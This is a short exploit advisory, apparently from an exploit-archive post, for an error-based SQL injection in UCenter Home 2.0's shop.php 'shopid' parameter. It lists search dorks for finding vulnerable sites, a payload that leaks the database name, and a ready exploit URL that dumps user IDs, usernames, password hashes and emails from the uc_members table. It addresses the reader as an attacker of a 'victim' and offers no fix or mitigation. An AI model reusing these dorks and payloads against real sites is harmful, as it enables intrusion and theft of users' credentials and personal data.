__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability Type : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

For Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

DB : Okay.
Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1